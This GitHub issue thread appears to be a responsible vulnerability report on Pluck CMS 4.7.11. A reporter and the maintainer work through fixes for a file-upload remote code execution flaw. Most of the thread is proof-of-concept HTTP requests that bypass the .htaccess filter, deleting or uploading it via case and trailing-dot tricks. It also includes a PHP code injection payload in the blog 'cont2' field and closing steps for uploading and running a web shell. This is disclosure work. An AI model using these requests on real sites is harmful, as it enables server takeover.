BSteelooper
commented
4 years ago Thanks... good find... Missed this in the testing. .htaccess will now be ignored when uploaded.
Closed wooyin closed 4 years ago
BSteelooper
commented
4 years ago Thanks... good find... Missed this in the testing. .htaccess will now be ignored when uploaded.
BSteelooper
commented
4 years ago Could you try the https://github.com/pluck-cms/pluck/tree/4.7.12-dev1 release?
wooyin
commented
4 years ago can bypass like this
GET /pluck-4.7.12-dev1/admin.php?action=deletefile&var1=.htaccess HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://127.0.0.1/pluck-4.7.12-dev1/admin.php?action=files
Cookie: PHPSESSID=57e7d8gah1oa5b6vomb6dnel35
Upgrade-Insecure-Requests: 1
And this way
POST /pluck-4.7.12-dev1/admin.php?action=files HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------293582696224464
Content-Length: 346
Connection: close
Referer: http://127.0.0.1/pluck-4.7.12-dev1/admin.php?action=files
Cookie: PHPSESSID=57e7d8gah1oa5b6vomb6dnel35
Upgrade-Insecure-Requests: 1
-----------------------------293582696224464
Content-Disposition: form-data; name="filefile"; filename=".htaccess..........."
Content-Type: application/octet-stream
-----------------------------293582696224464
Content-Disposition: form-data; name="submit"
Upload
-----------------------------293582696224464--
How does this last one work? the ..... is not omitted so it is not picked up by apache?
BSteelooper
commented
4 years ago could you do a retest with version https://github.com/pluck-cms/pluck/tree/4.7.12-dev2
wooyin
commented
4 years ago use strtolower()
GET /pluck-4.7.12-dev2/admin.php?action=deletefile&var1=.htACcess HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://127.0.0.1/pluck-4.7.12-dev2/admin.php?action=files
Cookie: PHPSESSID=mmhe135g2qbk80543g5f6bjksg
Upgrade-Insecure-Requests: 1
And you should solve this too.
cont2 is vulnable
POST /pluck-4.7.12-dev2/admin.php?module=blog&page=newpost HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 69
Connection: close
Referer: http://127.0.0.1/pluck-4.7.12-dev2/admin.php?module=blog&page=newpost
Cookie: PHPSESSID=mmhe135g2qbk80543g5f6bjksg
Upgrade-Insecure-Requests: 1
cont1=11111&cont2=2';phpinfo();/*&cont3=22222&save_exit=Save+and+ExitI test on Windows, the system will delete points automatically
BSteelooper
commented
4 years ago Ok.. I’ll try to find a solution for the windows mishaps
Pluck-4.7.11 admin background exists a remote command execution vulnerability when uploading files
Proof step1: login -> pages -> manage files upload .htaccess file to turn files/.htaccess to .htaccess.txt
step2: throw .htaccess.txt into trash
step3: upload shell code
step4: view http://127.0.0.1/pluck4711/files/pass07.php